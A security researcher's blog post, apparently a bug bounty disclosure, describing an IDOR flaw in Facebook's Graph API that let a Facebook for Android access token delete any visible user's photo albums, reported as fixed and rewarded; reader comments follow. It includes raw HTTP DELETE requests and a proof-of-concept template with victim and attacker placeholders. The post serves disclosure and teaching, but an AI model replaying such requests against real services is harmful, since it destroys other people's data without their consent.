Deleting any photo albums – How I Hacked Your Facebook Photos

What if your photos get deleted without your knowledge?

That would be pretty upsetting, wouldn’t it? This post is about a vulnerability I found that allowed malicious users to delete any photo album on Facebook. Any photo album owned by a user, a page, or a group could be deleted.

Graph API is the primary way for developers to read and write user data. All Facebook apps currently use Graph API. In general, Graph API requires an access token to read or write user data. Read more about Graph API here.

According to Facebook’s developer documentation, photo albums cannot be deleted using the album node in Graph API.

I tried to delete one of my photo albums using a Graph Explorer access token.

Request:


DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
access_token=CAACEd.....MUZD

Response:

{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}

Why? Because this application doesn’t have the capability to delete photo albums. But we need to note the error message. It tells us that some application does have the capability to make this API call.

I decided to try it with a Facebook mobile access token because it is a top-level access token that has some extra permissions. Facebook mobile apps use the same Graph API, so I took an album ID and my Facebook for Android access token and tried it.

Request:


DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>

Response:

true

Album (518171421550249) got deleted! So what’s the next step? I took a victim’s album ID and tried to verify if there is a insecure object reference vulnerability. I was very curious to see the result.

Request:


DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>

Response:

true

OMG! To my surprise, the album got deleted! Confirming the presence of IDOR vulnerability. So what? I had access to delete all of your Facebook photos (photos that were public or that I could see)!

Also, see how hackers hack Facebook account and their prevention techniques.

I immediately reported this bug to the Facebook security team. They were very quick in identifying this issue and had a fix in place in less than 2 hours from acknowledging the report.

Read more about getting a Facebook for Android access token [Capture Android HTTP/HTTPS Traffic].

Final Proof of Concept:

Request:


DELETE /<Victim's_photo_album_id> HTTP/1.1
Host: graph.facebook.com
Content-Length: 245
access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>

If you aren’t sure how to do it, please see this video [How I Hacked Your Public Facebook Photos] (replace this with the actual video link).

Acknowledgement of fix and reward of $12,500 USD for reporting this vulnerability.

Acknowledgement of fix

This vulnerability is completely fixed now.

I thank the Facebook Security Team for running a bug bounty program and for quickly fixing this issue.

HALL OF FAME: https://www.facebook.com/whitehat/thanks

Laxman Muthiyah Facebook Whitehat Hacker Updated List 2015

This article is available as PDF Download.

Laxman Muthiyah
Laxman Muthiyah
This is the place where I write about things that I have explored. I hope you enjoy your stay!

Related Stories

55 Comments

  1. Awesome job bro…

    I&#39m very happy hearing that there are some good whitehats in India also..
    Congrats..

    Can you suggest me some great free online learning place for web development???

  2. Waw so simple but so nice! It&#39s incredible… I mean, of course you&#39re really smart and this was a great hack bu everybody could do this in few hours without a huge knowledge! That&#39s so surprinsing!
    You also were able to delete posts and publish, Right?

  3. Hello.. M in a big problem and i hope i will get solution from this site..Actually my friends facebook profile has been hacked.. Somebody has created the public page with her name which contains all her pictures amd posts.. Everytime she posts or put pictures on her facebook page that public page also did the same..That page is not genuine and contains very bad comments in it..And the big problem is it contains my picture too..I want to know how to delete my picture from dat page beacuse i dont want it to remain there..Also how can we delete that page?? Please help me.. This is a big trouble for a girl..

  4. Hello.. Ι ΑΜ in a big problem and i hope i will get solution from this site..Actually my friend&#39s facebook profile has been hacked.. Somebody has created the public page with her name which contains all her pictures amd posts.. Everytime she posts or put pictures on her facebook page that public page also did the same..That page is not genuine and contains very bad comments in it..And the big problem is it contains my picture too..I want to know how to delete my picture from that page beacuse i dont want it to remain there..Also how can we delete that page?? Please help me…..

  5. Virtually , you can use this method to delete any photo albums that belongs to a user who have registered to your facebook app , not any facebook user.

  6. Nice find. Keep inspiring people. 🙂 I have one silly question, hope i will get the answer. I cannot understand how is it showing "facebook for android" with app id, in APP ID section on your access token page.
    I actually created one facebook page long back and it is showing that page app id in the access token page.

Leave A Reply

Please enter your comment!
Please enter your name here

Stay on top - Get the latest updates in your inbox